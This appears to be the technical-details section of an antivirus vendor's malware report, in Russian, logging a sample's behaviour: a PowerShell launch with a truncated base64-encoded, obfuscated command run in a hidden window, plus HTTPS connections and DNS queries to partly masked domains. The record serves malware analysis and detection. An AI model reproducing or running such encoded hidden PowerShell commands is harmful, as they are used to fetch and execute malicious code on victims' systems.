Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBlAHQALQBpAHQAZQBtACAAIABWAEEAcgBJAGEAYgBsAEUAOgBtADMAYgBYACAAIAAoAFsAdAB5AHAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBzAFkAUwBUAGUAbQAnACwAJwBlAEMAdA...
- 'ly#####ssforless.com':443
- '99###rics.com':443
- 'ta####digital.com':443
- 'iq##.com':443
- 'ex####eneuro.com':443
- 'ma#####osinjuicio.com':443
- DNS ASK ly#####ssforless.com
- DNS ASK 99###rics.com
- DNS ASK sp###ypush.com
- DNS ASK ta####digital.com
- DNS ASK iq##.com
- DNS ASK ex####eneuro.com
- DNS ASK ma#####osinjuicio.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBlAHQALQBpAHQAZQBtACAAIABWAEEAcgBJAGEAYgBsAEUAOgBtADMAYgBYACAAIAAoAFsAdAB5AHAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBzAFkAUwBUAGUAbQAnACwAJwBlAEMAdA...' (со скрытым окном)